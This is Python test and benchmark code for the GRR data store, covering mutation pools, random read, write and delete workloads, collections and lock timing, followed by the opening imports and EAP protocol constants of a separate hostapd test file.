stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, "hello")
pool = data_store.DB.GetMutationPool(token=self.token)
pool.DeleteAttributes(self.test_row, [predicate])
# Check it's still there.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, "hello")
pool.Flush()
# Now it should be gone.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertIsNone(stored)
def testPoolMultiSet(self):
pool = data_store.DB.GetMutationPool(token=self.token)
unicode_string = u"this is a uñîcödé string"
pool.MultiSet(self.test_row, {
"aff4:size": [1],
"aff4:stored": [unicode_string],
"aff4:unknown_attribute": ["hello"]
})
# Nothing is written before Flush() is called.
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertIsNone(stored)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertIsNone(stored)
# Flush.
pool.Flush()
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, unicode_string)
# Make sure that unknown attributes are stored as bytes.
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:unknown_attribute", token=self.token)
self.assertEqual(stored, "hello")
self.assertEqual(type(stored), str)
@DeletionTest
def testPoolDeleteAttributes(self):
predicate = "metadata:predicate"
pool = data_store.DB.GetMutationPool(token=self.token)
data_store.DB.Set(self.test_row, predicate, "hello", token=self.token)
# Check it's there.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, "hello")
pool.DeleteAttributes(self.test_row, [predicate])
# Check it's still there.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, "hello")
pool.Flush()
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertIsNone(stored)
class DataStoreCSVBenchmarks(test_lib.MicroBenchmarks):
"""Long running benchmarks where the results are dumped to a CSV file.
These tests are deliberately not named with the test prefix, since they need
to be run individually to get true performance data. Run by specifying the
testname with --test and setting --labels=benchmark.
The CSV output filename will be printed in a log message at the end of the
test.
"""
labels = ["large"]
# What we consider as a big number of attributes.
BIG_NUM_ATTRIBUTES = 1000
units = "s"
# Database counters.
subjects = 0
predicates = 0
values = 0
queries_total = 0 # Total queries.
queries_last_timestep = 0 # Number of the queries up to the last timestep.
steps = 0 # How many steps so far.
query_interval = 3000 # A step is composed of this many queries.
test_name = "" # Current operation being run.
start_time = None
last_time = None
predicate_template = "task:flow%d"
def setUp(self):
super(DataStoreCSVBenchmarks, self).setUp(
["DB Size (KB)", "Queries", "Subjects", "Predicates",
"Values"], ["<20", "<10", "<10", "<10", "<10"])
self.InitDatastore()
self.start_time = time.time()
self.last_time = self.start_time
def tearDown(self):
self.Register(force=True)
super(DataStoreCSVBenchmarks, self).tearDown()
self.WriteCSV()
self.DestroyDatastore()
def Register(self, force=False):
"""Add a new result line to the benchmark result."""
self.queries_total += 1
if self.queries_total % self.query_interval == 0 or force:
data_store.DB.Flush()
this_time = time.time()
queries_diff = self.queries_total - self.queries_last_timestep
self.queries_last_timestep = self.queries_total
self.last_time = this_time
self.steps += 1
self.AddResult(self.test_name, this_time - self.start_time, self.steps,
data_store.DB.Size() / 1024, queries_diff, self.subjects,
self.predicates, self.values)
def WriteCSV(self, remove=False):
"""Write results to a CSV file."""
with tempfile.NamedTemporaryFile(suffix=".csv", delete=False) as fp:
writer = csv.writer(fp, delimiter=" ")
writer.writerow([
"Benchmark", "Time", "DBSize", "Queries", "Subjects", "Predicates",
"Values"
])
for row in self.scratchpad[2:]:
writer.writerow(
[row[0], row[1], row[3], row[4], row[5], row[6], row[7]])
logging.info("CSV File is in %s", fp.name)
if remove:
os.unlink(fp.name)
def _RandomlyReadSubject(self, subject, predicates):
"""Read certain parts of a given subject."""
for j, timestamps in predicates.items():
which = self.rand.randint(0, 2)
if which == 0:
# Read all timestamps.
data_store.DB.ResolveMulti(
subject, [self.predicate_template % j],
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
elif which == 1:
# Read a specific timestamp.
if timestamps:
ts = self.rand.choice(timestamps)
data_store.DB.ResolveMulti(
subject, [self.predicate_template % j],
timestamp=(ts, ts),
token=self.token)
elif which == 2:
# Read latest.
data_store.DB.Resolve(
subject, self.predicate_template % j, token=self.token)
self.Register()
which = self.rand.randint(0, 1)
if which == 0:
# Find all attributes.
data_store.DB.ResolvePrefix(
subject,
"task:flow",
timestamp=data_store.DB.NEWEST_TIMESTAMP,
token=self.token)
elif which == 1:
# Find all attributes with a prefix reducable regex.
data_store.DB.ResolvePrefix(
subject,
"task:",
timestamp=data_store.DB.NEWEST_TIMESTAMP,
token=self.token)
self.Register()
def _ReadRandom(self, subjects, fraction, change_test=True):
"""Randomly read the database."""
if change_test:
self.test_name = "read random %d%%" % fraction
for _ in range(0, int(float(len(subjects)) * float(fraction) / 100.0)):
i = self.rand.choice(subjects.keys())
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
self._RandomlyReadSubject(subject, predicates)
def _UpdateRandom(self, subjects, fraction, change_test=True):
"""Update values/predicates for a given fraction of the subjects."""
if change_test:
self.test_name = "update %d%%" % fraction
new_value = os.urandom(100)
for i in subjects:
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
if self.rand.randint(0, 100) > fraction:
continue
which = self.rand.randint(0, 2)
if which == 0 or which == 1:
for j, timestamp_info in predicates.items():
number_timestamps = len(timestamp_info)
if which == 0 and len(timestamp_info):
# Update one timestamp'ed value.
data_store.DB.Set(
subject,
self.predicate_template % j,
new_value,
timestamp=timestamp_info[-1],
token=self.token)
self.Register()
elif which == 1:
# Add another timestamp.
timestamp_info.append(100 * number_timestamps + 1)
data_store.DB.Set(
subject,
self.predicate_template % j,
new_value,
replace=False,
timestamp=timestamp_info[-1],
token=self.token)
self.values += 1
self.Register()
elif which == 2:
# Add an extra predicate.
j = len(predicates)
number_timestamps = self.rand.randrange(1, 3)
ts = [100 * (ts + 1) for ts in xrange(number_timestamps)]
predicates[j] = ts
self.values += number_timestamps
self.predicates += 1
values = [(new_value, t) for t in ts]
data_store.DB.MultiSet(
subject, {self.predicate_template % j: values},
replace=False,
timestamp=100,
token=self.token)
self.Register()
data_store.DB.Flush()
def _DeleteRandom(self, subjects, fraction, change_test=True):
"""Delete predicates/subjects/values at random."""
if change_test:
self.test_name = "delete %d%%" % fraction
subjects_to_delete = []
for i, info in subjects.items():
subject = info["name"]
predicates = info["attrs"]
number_predicates = len(predicates)
do_it = (self.rand.randint(0, 100) <= fraction)
which = self.rand.randint(0, 2)
count_values = 0
predicates_to_delete = []
for j, timestamp_info in predicates.items():
number_timestamps = len(timestamp_info)
count_values += number_timestamps
if do_it:
if which == 0:
# Delete one timestamp'ed value.
if timestamp_info:
ts = timestamp_info[0]
data_store.DB.DeleteAttributes(
subject, [self.predicate_template % j],
start=ts,
end=ts,
token=self.token)
self.values -= 1
timestamp_info.pop(0)
self.Register()
else:
which = 1
if which == 1:
# Delete the attribute itself.
data_store.DB.DeleteAttributes(
subject, [self.predicate_template % j], token=self.token)
self.values -= number_timestamps
self.predicates -= 1
predicates_to_delete.append(j)
self.Register()
if do_it and which == 1:
for j in predicates_to_delete:
del predicates[j]
if do_it and which == 2:
# Delete subject.
data_store.DB.DeleteSubject(subject, token=self.token)
self.predicates -= number_predicates
self.values -= count_values
self.subjects -= 1
subjects_to_delete.append(i)
self.Register()
for i in subjects_to_delete:
del subjects[i]
data_store.DB.Flush()
def _GrowRandomly(self, subjects, fraction, nclients, change_test=True):
"""Adds new clients/subjects to the database."""
if change_test:
self.test_name = "add %d%%" % fraction
how_many = int(float(len(subjects)) * float(fraction) / 100)
new_value = os.urandom(100)
new_subject = max(subjects.iteritems(), key=operator.itemgetter(0))[0] + 1
# Generate client names.
clients = [self._GenerateRandomClient() for _ in xrange(nclients)]
for i in xrange(new_subject, new_subject + how_many):
client = clients[self.rand.randint(0, nclients - 1)]
self._AddNewSubject(client, subjects, i, new_value)
data_store.DB.Flush()
def _GenerateRandomSubject(self):
n = self.rand.randint(1, 5)
seps = [
self._GenerateRandomString(self.rand.randint(5, 10)) for _ in xrange(n)
]
return "/".join(seps)
def _AddNewSubject(self, client, subjects, i, value, max_attributes=3):
"""Add a new subject to the database."""
number_predicates = self.rand.randrange(1, max_attributes)
self.subjects += 1
predicates = dict.fromkeys(xrange(number_predicates))
self.predicates += number_predicates
subject = str(client.Add(self._GenerateRandomSubject()))
for j in xrange(number_predicates):
number_timestamps = self.rand.randrange(1, 3)
self.values += number_timestamps
ts = [100 * (ts + 1) for ts in xrange(number_timestamps)]
predicates[j] = ts
values = [(value, t) for t in ts]
data_store.DB.MultiSet(
subject, {self.predicate_template % j: values},
timestamp=100,
replace=False,
sync=False,
token=self.token)
self.Register()
info = {"name": subject, "attrs": predicates}
subjects[i] = info
def _ReadLinear(self, subjects, fraction):
"""Linearly read subjects from the database."""
self.test_name = "read linear %d%%" % fraction
for i in subjects:
if self.rand.randint(0, 100) > fraction:
return
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
self._RandomlyReadSubject(subject, predicates)
def _AddManyAttributes(self, subjects, many):
"""Add lots of predicates to a given number of subjects."""
self.test_name = "add +attrs %d" % many
new_value = os.urandom(100)
for _ in range(0, many):
i = self.rand.choice(subjects.keys())
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
how_many = self.rand.randint(self.BIG_NUM_ATTRIBUTES,
self.BIG_NUM_ATTRIBUTES + 1000)
self.predicates += how_many
new_predicate = max(
predicates.iteritems(), key=operator.itemgetter(0))[0] + 1
for j in xrange(new_predicate, new_predicate + how_many):
number_timestamps = self.rand.randrange(1, 3)
ts = [100 * (ts + 1) for ts in xrange(number_timestamps)]
self.values += number_timestamps
values = [(new_value, t) for t in ts]
predicates[j] = ts
data_store.DB.MultiSet(
subject, {self.predicate_template % j: values},
replace=False,
timestamp=100,
sync=False,
token=self.token)
self.Register()
data_store.DB.Flush()
def _RemoveManyAttributes(self, subjects, fraction):
"""Delete all predicates (except 1) from subjects with many predicates."""
self.test_name = "del +attrs %d%%" % fraction
often = 100 / fraction
count = 0
for i in subjects:
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
number_predicates = len(predicates)
if number_predicates >= self.BIG_NUM_ATTRIBUTES:
count += 1
if count == often:
count = 0
predicates_to_delete = [j for j in predicates.keys()[1:]]
values_deleted = sum(len(predicates[x]) for x in predicates_to_delete)
self.values -= values_deleted
self.predicates -= len(predicates_to_delete)
for j in predicates_to_delete:
del predicates[j]
data_store.DB.DeleteAttributes(
subject, [self.predicate_template % j],
sync=False,
token=self.token)
self.Register()
data_store.DB.Flush()
def _Wipeout(self, subjects):
"""Delete every subject from the database."""
self.test_name = "wipeout"
for i in subjects:
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
number_predicates = len(predicates)
count_values = 0
for j in predicates:
count_values += len(predicates[j])
data_store.DB.DeleteSubject(subject, token=self.token)
self.predicates -= number_predicates
self.values -= count_values
self.subjects -= 1
self.Register()
subjects = {}
data_store.DB.Flush()
def _DoMix(self, subjects):
"""Do a mix of database operations."""
self.test_name = "mix"
for _ in xrange(0, len(subjects) / 2000):
# Do random operations.
op = self.rand.randint(0, 3)
if op == 0:
self._ReadRandom(subjects, 14, False)
elif op == 1:
self._GrowRandomly(subjects, 5, 20, False)
elif op == 2:
self._UpdateRandom(subjects, 10, False)
elif op == 3:
self._DeleteRandom(subjects, 4, False)
def _GenerateRandomClient(self):
return rdf_client.ClientURN("C.%016d" % self.rand.randint(0, (10**16) - 1))
def _FillDatabase(self, nsubjects, nclients, max_attributes=3):
"""Fill the database with a certain number of subjects and clients."""
self.rand = random.Random(0)
self.test_name = "fill"
self.AddResult(self.test_name, 0, self.steps,
data_store.DB.Size(), 0, 0, 0, 0)
subjects = dict.fromkeys(xrange(nsubjects))
value = os.urandom(100)
clients = [self._GenerateRandomClient() for _ in xrange(nclients)]
for i in subjects:
client = self.rand.choice(clients)
self._AddNewSubject(client, subjects, i, value, max_attributes)
data_store.DB.Flush()
return subjects
def _GenerateRandomString(self, chars):
return "".join(
[self.rand.choice(string.ascii_letters) for _ in xrange(chars)])
def _AddBlobs(self, howmany, size):
"""Adds 'howmany' blobs with size 'size' kbs."""
self.test_name = "add blobs %dx%dk" % (howmany, size)
count = 0
often = howmany / 10
for count in xrange(howmany):
data = self._GenerateRandomString(1024 * size)
data_store.DB.StoreBlob(data, token=self.token)
if count % often == 0:
# Because adding blobs, takes too long we force the output of
# new results.
self.Register(force=True)
self.Register(force=True)
data_store.DB.Flush()
@test_lib.SetLabel("benchmark")
def manySubjectsFewAttrs(self):
"""Database with many subjects with few attributes."""
subjects = self._FillDatabase(25000, 500)
self._ReadLinear(subjects, 50)
self._UpdateRandom(subjects, 50)
self._ReadRandom(subjects, 70)
self._DeleteRandom(subjects, 40)
self._GrowRandomly(subjects, 40, 50)
self._ReadRandom(subjects, 100)
self._DoMix(subjects)
self._Wipeout(subjects)
@test_lib.SetLabel("benchmark")
def manySubjectsFewWithManyAttrs(self):
"""Database where a few subjects have many attributes."""
subjects = self._FillDatabase(25000, 500)
self._UpdateRandom(subjects, 50)
self._AddManyAttributes(subjects, 100)
self._ReadRandom(subjects, 30)
# For 1/2 of the subjects with many attributes, remove all but
# one of the attributes.
self._RemoveManyAttributes(subjects, 50)
self._ReadRandom(subjects, 30)
self._UpdateRandom(subjects, 50)
self._Wipeout(subjects)
@test_lib.SetLabel("benchmark")
def fewSubjectsManyAttrs(self):
"""Database with a few subjects with many attributes."""
subjects = self._FillDatabase(100, 5)
self._UpdateRandom(subjects, 100)
self._AddManyAttributes(subjects, 50)
self._ReadRandom(subjects, 30)
self._RemoveManyAttributes(subjects, 50)
self._ReadRandom(subjects, 50)
self._Wipeout(subjects)
@test_lib.SetLabel("benchmark")
def blobs(self):
"""Database that stores blobs of increasing size."""
subjects = self._FillDatabase(10000, 200)
def _ReadUpdate():
self._ReadRandom(subjects, 75)
self._UpdateRandom(subjects, 20)
_ReadUpdate()
self._AddBlobs(50, 512)
_ReadUpdate()
self._AddBlobs(50, 2048)
_ReadUpdate()
self._AddBlobs(50, 10240)
_ReadUpdate()
self._AddBlobs(20, 10240 * 10)
_ReadUpdate()
@test_lib.SetLabel("benchmark")
def manySubjectsManyAttrs(self):
"""Database with many subjects with many attributes."""
subjects = self._FillDatabase(25000, 500, 50)
self._ReadLinear(subjects, 50)
self._UpdateRandom(subjects, 50)
self._ReadRandom(subjects, 50)
self._DeleteRandom(subjects, 40)
self._GrowRandomly(subjects, 40, 50)
self._ReadRandom(subjects, 50)
self._DoMix(subjects)
self._Wipeout(subjects)
class DataStoreBenchmarks(test_lib.MicroBenchmarks):
"""Datastore micro benchmarks.
These tests should be run with --labels=benchmark
"""
queue = rdfvalue.RDFURN("BENCHMARK")
units = "s"
labels = ["large"]
def setUp(self):
super(DataStoreBenchmarks, self).setUp()
self.InitDatastore()
self.tp = threadpool.ThreadPool.Factory("test_pool", 50)
self.tp.Start()
def tearDown(self):
super(DataStoreBenchmarks, self).tearDown()
self.tp.Stop()
self.DestroyDatastore()
def InitDatastore(self):
"""Initiates custom data store."""
def DestroyDatastore(self):
"""Destroys custom data store."""
def GenerateFiles(self, client_id, n, directory="dir/dir"):
res = []
for i in xrange(n):
res.append(
rdf_client.StatEntry(
aff4path="aff4:/%s/fs/os/%s/file%d" % (client_id, directory, i),
st_mode=33261,
st_ino=1026267,
st_dev=51713,
st_nlink=1,
st_uid=0,
st_gid=0,
st_size=60064,
st_atime=1308964274,
st_mtime=1285093975,
st_ctime=1299502221,
st_blocks=128,
st_blksize=4096,
st_rdev=0,
pathspec=rdf_paths.PathSpec(
path="/dir/dir/file%d" % i, pathtype=0)))
return res
def StartFlow(self, client_id):
flow_id = flow.GRRFlow.StartFlow(
client_id=client_id,
flow_name="ListDirectory",
queue=self.queue,
pathspec=rdf_paths.PathSpec(
path="/",
pathtype="OS",),
token=self.token)
self.flow_ids.append(flow_id)
messages = []
for d in range(self.nr_dirs):
messages += self.GenerateFiles(client_id, self.files_per_dir,
"dir/dir%d" % d)
messages.append(rdf_flows.GrrStatus())
with queue_manager.QueueManager(token=self.token) as flow_manager:
for i, payload in enumerate(messages):
msg = rdf_flows.GrrMessage(
session_id=flow_id,
request_id=1,
response_id=1 + i,
auth_state=rdf_flows.GrrMessage.AuthorizationState.AUTHENTICATED,
payload=payload)
if isinstance(payload, rdf_flows.GrrStatus):
msg.type = 1
flow_manager.QueueResponse(flow_id, msg)
nr_clients = 4
nr_dirs = 4
files_per_dir = 500
def _GenerateRandomString(self, chars):
return "".join(
[self.rand.choice(string.ascii_letters) for _ in xrange(chars)])
# Constants to control the size of testCollections. These numbers run in a
# reasonable amount of time for a unit test [O(20s)] on most data stores.
RECORDS = 5000
RECORD_SIZE = 1000
READ_COUNT = 50
BIG_READ_SIZE = 25
# The sequential collection index is only computed for records 5m old, so we
# write records this far in the past in order to force index creation.
INDEX_DELAY = rdfvalue.Duration("10m")
@test_lib.SetLabel("benchmark")
def testCollections(self):
self.rand = random.Random(42)
#
# Populate and exercise a packed versioned collection.
#
packed_collection_urn = rdfvalue.RDFURN("aff4:/test_packed_collection")
packed_collection = aff4.FACTORY.Create(
packed_collection_urn,
collects.PackedVersionedCollection,
mode="w",
token=self.token)
packed_collection.Close()
start_time = time.time()
for _ in range(self.RECORDS):
collects.PackedVersionedCollection.AddToCollection(
packed_collection_urn,
rdfvalue.RDFString(self._GenerateRandomString(self.RECORD_SIZE)),
token=self.token)
elapsed_time = time.time() - start_time
self.AddResult("Packed Coll. Add (size %d)" % self.RECORD_SIZE,
elapsed_time, self.RECORDS)
with aff4.FACTORY.OpenWithLock(
packed_collection_urn, lease_time=3600,
token=self.token) as packed_collection:
start_time = time.time()
packed_collection.Compact()
elapsed_time = time.time() - start_time
self.AddResult("Packed Coll. Compact", elapsed_time, 1)
packed_collection = aff4.FACTORY.Create(
packed_collection_urn,
collects.PackedVersionedCollection,
mode="r",
token=self.token)
start_time = time.time()
for _ in range(self.READ_COUNT):
for _ in packed_collection.GenerateItems(offset=self.rand.randint(
0, self.RECORDS - 1)):
break
elapsed_time = time.time() - start_time
self.AddResult("Packed Coll. random 1 record reads", elapsed_time,
self.READ_COUNT)
start_time = time.time()
for _ in range(self.READ_COUNT):
count = 0
for _ in packed_collection.GenerateItems(offset=self.rand.randint(
0, self.RECORDS - self.BIG_READ_SIZE)):
count += 1
if count >= self.BIG_READ_SIZE:
break
elapsed_time = time.time() - start_time
self.AddResult("Packed Coll. random %d record reads" % self.BIG_READ_SIZE,
elapsed_time, self.READ_COUNT)
start_time = time.time()
for _ in packed_collection.GenerateItems():
pass
elapsed_time = time.time() - start_time
self.AddResult("Packed Coll. full sequential read", elapsed_time, 1)
#
# Populate and exercise an indexed sequential collection.
#
indexed_collection = aff4.FACTORY.Create(
"aff4:/test_seq_collection",
StringSequentialCollection,
mode="rw",
token=self.token)
start_time = time.time()
for _ in range(self.RECORDS):
indexed_collection.Add(
rdfvalue.RDFString(self._GenerateRandomString(self.RECORD_SIZE)),
timestamp=rdfvalue.RDFDatetime.Now() - self.INDEX_DELAY)
elapsed_time = time.time() - start_time
self.AddResult("Seq. Coll. Add (size %d)" % self.RECORD_SIZE, elapsed_time,
self.RECORDS)
start_time = time.time()
self.assertEqual(len(indexed_collection), self.RECORDS)
elapsed_time = time.time() - start_time
self.AddResult("Seq. Coll. Read to end", elapsed_time, 1)
start_time = time.time()
for _ in range(self.READ_COUNT):
for _ in indexed_collection.GenerateItems(offset=self.rand.randint(
0, self.RECORDS - 1)):
break
elapsed_time = time.time() - start_time
self.AddResult("Seq. Coll. random 1 record reads", elapsed_time,
self.READ_COUNT)
start_time = time.time()
for _ in range(self.READ_COUNT):
count = 0
for _ in indexed_collection.GenerateItems(offset=self.rand.randint(
0, self.RECORDS - self.BIG_READ_SIZE)):
count += 1
if count >= self.BIG_READ_SIZE:
break
elapsed_time = time.time() - start_time
self.AddResult("Seq. Coll. random %d record reads" % self.BIG_READ_SIZE,
elapsed_time, self.READ_COUNT)
start_time = time.time()
for _ in indexed_collection.GenerateItems():
pass
elapsed_time = time.time() - start_time
self.AddResult("Seq. Coll. full sequential read", elapsed_time, 1)
@test_lib.SetLabel("benchmark")
def testSimulateFlows(self):
self.flow_ids = []
self.units = "s"
client_ids = ["C.%016X" % j for j in range(1, self.nr_clients + 1)]
start_time = time.time()
for client_id in client_ids:
self.tp.AddTask(self.StartFlow, (client_id,))
self.tp.Join()
notifications = [
rdf_flows.GrrNotification(session_id=f) for f in self.flow_ids
]
with queue_manager.QueueManager(token=self.token) as manager:
manager.MultiNotifyQueue(notifications)
time_used = time.time() - start_time
self.AddResult("Generate Messages (%d clients, %d files)" % (
self.nr_clients, self.nr_dirs * self.files_per_dir), time_used, 1)
my_worker = worker.GRRWorker(queues=[self.queue], token=self.token)
start_time = time.time()
while my_worker.RunOnce():
pass
my_worker.thread_pool.Join()
time_used = time.time() - start_time
self.AddResult("Process Messages", time_used, 1)
@test_lib.SetLabel("benchmark")
def testMicroBenchmarks(self):
# Tests run in arbitrary order but for the benchmarks, the order makes a
# difference so we call them all from one test here.
self.n = 1000
self.small_n = self.n / 100
self.units = "ms"
self.BenchmarkWriting()
self.BenchmarkReading()
self.BenchmarkWritingThreaded()
self.BenchmarkReadingThreaded()
self.BenchmarkAFF4Locks()
def BenchmarkWriting(self):
subject_template = "aff4:/row%d"
predicate_template = "task:flow%d"
value = os.urandom(100)
large_value = os.urandom(10 * 1024 * 1024)
start_time = time.time()
for i in xrange(self.n):
data_store.DB.Set(
subject_template % i, "task:flow", value, token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Set rows", (end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.n):
data_store.DB.Set(
"aff4:/somerow", predicate_template % i, value, token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Set attributes", (end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.n):
data_store.DB.Set(
"aff4:/somerow",
"task:someflow",
value,
replace=False,
token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Set versions", (end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.small_n):
data_store.DB.Set(
"aff4:/largerow%d" % i,
"task:largeflow",
large_value,
replace=False,
token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Set large values", (end_time - start_time) / self.small_n,
self.small_n)
def BenchmarkReading(self):
subject_template = "aff4:/row%d"
predicate_template = "task:flow%d"
start_time = time.time()
for i in xrange(self.n):
data_store.DB.Resolve(subject_template % i, "task:flow", token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Get rows", (end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.n):
data_store.DB.Resolve(
"aff4:/somerow", predicate_template % i, token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Get attributes", (end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.small_n):
data_store.DB.ResolvePrefix(
"aff4:/somerow",
"task:someflow",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Get all versions", (end_time - start_time) / self.small_n,
self.small_n)
start_time = time.time()
for i in xrange(self.small_n):
res = data_store.DB.ResolvePrefix(
"aff4:/largerow%d" % i,
"task:largeflow",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
self.assertEqual(len(res), 1)
self.assertEqual(len(res[0][1]), 10 * 1024 * 1024)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Get large values", (end_time - start_time) / self.small_n,
self.small_n)
def BenchmarkWritingThreaded(self):
subject_template = "aff4:/threadedrow%d"
predicate_template = "task:threadedflow%d"
value = os.urandom(100)
large_value = os.urandom(10 * 1024 * 1024)
start_time = time.time()
for i in xrange(self.n):
self.tp.AddTask(data_store.DB.Set, (
subject_template % i, "task:threadedflow", value, None, self.token))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Set rows", (end_time - start_time) / self.n,
self.n)
start_time = time.time()
for i in xrange(self.n):
self.tp.AddTask(data_store.DB.Set,
("aff4:/somerowthreaded", predicate_template % i, value,
None, self.token))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Set attributes",
(end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.n):
self.tp.AddTask(data_store.DB.Set,
("aff4:/somerowthreaded", "task:someflowthreaded", value,
None, self.token, False))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Set versions",
(end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.small_n):
self.tp.AddTask(data_store.DB.Set,
("aff4:/threadedlargerow%d" % i, "task:largeflowthreaded",
large_value, None, self.token, False))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Set large values",
(end_time - start_time) / self.small_n, self.small_n)
def ResolvePrefixAndCheck(self, subject, predicate, expected_items=1000):
res = data_store.DB.ResolvePrefix(
subject,
predicate,
token=self.token,
timestamp=data_store.DB.ALL_TIMESTAMPS)
self.assertEqual(len(list(res)), expected_items)
def BenchmarkReadingThreaded(self):
subject_template = "aff4:/threadedrow%d"
predicate_template = "task:threadedflow%d"
start_time = time.time()
for i in xrange(self.n):
self.tp.AddTask(data_store.DB.Resolve, (subject_template % i,
"task:threadedflow", self.token))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Get rows", (end_time - start_time) / self.n,
self.n)
start_time = time.time()
for i in xrange(self.n):
self.tp.AddTask(data_store.DB.Resolve, (
"aff4:/somerowthreaded", predicate_template % i, self.token))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Get attributes",
(end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.small_n):
self.tp.AddTask(self.ResolvePrefixAndCheck, ("aff4:/somerowthreaded",
"task:someflowthreaded"))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Get all versions",
(end_time - start_time) / self.small_n, self.small_n)
start_time = time.time()
for i in xrange(self.small_n):
self.tp.AddTask(self.ResolvePrefixAndCheck, (
"aff4:/threadedlargerow%d" % i, "task:largeflowthreaded", 1))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Get large values",
(end_time - start_time) / self.small_n, self.small_n)
def BenchmarkAFF4Locks(self):
self.client_id = "C.%016X" % 999
# Write some data to read.
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
cl = aff4.FACTORY.Open(self.client_id, token=self.token)
self.assertEqual(cl.Get(cl.Schema.HOSTNAME), "client1")
# Collect exceptions in threads.
self.fails = []
def Thread():
try:
# Using blocking_lock_timeout of 10 minutes to avoid possible
# timeouts when running tests on slow hardware.
with aff4.FACTORY.OpenWithLock(
self.client_id,
token=self.token,
blocking=True,
blocking_sleep_interval=0.2,
blocking_lock_timeout=600) as client:
self.assertEqual(client.Get(client.Schema.HOSTNAME), "client1")
except Exception as e: # pylint: disable=broad-except
self.fails.append(e)
start_time = time.time()
for _ in xrange(self.n):
Thread()
end_time = time.time()
self.AddResult("OpenWithLock", (end_time - start_time) / self.n, self.n)
self.assertEqual(len(self.fails), 0)
start_time = time.time()
for _ in xrange(self.n):
self.tp.AddTask(Thread, ())
self.tp.Join()
end_time = time.time()
self.AddResult("Multithreaded: OpenWithLock",
(end_time - start_time) / self.n, self.n)
self.assertEqual(len(self.fails), 0)
|
test_eap_proto.py | # EAP protocol tests
# Copyright (c) 2014-2015, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import binascii
import hashlib
import hmac
import logging
logger = logging.getLogger()
import select
import struct
import threading
import time
import hostapd
from utils import HwsimSkip, alloc_fail, fail_test, wait_fail_trigger
from test_ap_eap import check_eap_capa, check_hlr_auc_gw_support
from test_erp import check_erp_capa
EAP_CODE_REQUEST = 1
EAP_CODE_RESPONSE = 2
EAP_CODE_SUCCESS = 3
EAP_CODE_FAILURE = 4
EAP_CODE_INITIATE = 5
EAP_CODE_FINISH = 6
EAP_TYPE_IDENTITY = 1
EAP_TYPE_NOTIFICATION = 2
EAP_TYPE_NAK = 3
EAP_TYPE_MD5 = 4
EAP_TYPE_OTP = 5
EAP_TYPE_GTC = 6
EAP_TYPE_TLS = 13
EAP_TYPE_LEAP = 17
EAP_TYPE_SIM = 18
EAP_TYPE_TTLS = 21
EAP_TYPE_AKA = 23
EAP_TYPE_PEAP = 25
EAP_TYPE_MSCHAPV2 = 26
EAP_TYPE_TLV = 33
EAP_TYPE_TNC = 38
EAP_TYPE_FAST = 43
EAP_TYPE_PAX = 46
EAP_TYPE_PSK = 47
EAP_TYPE_SAKE = 48
EAP_TYPE_IKEV2 = 49
EAP_TYPE_AKA_PRIME = 50
EAP_TYPE_GPSK = 51
EAP_TYPE_PWD = 52
EAP_TYPE_EKE = 53
# Type field in EAP-Initiate and EAP-Finish messages
EAP_ERP_TYPE_REAUTH_START = 1
EAP_ERP_TYPE_REAUTH = 2
EAP_ERP_TLV_KEYNAME_NAI = 1
EAP_ERP_TV_RRK_LIFETIME = 2
EAP_ERP_TV_RMSK_LIFETIME = 3
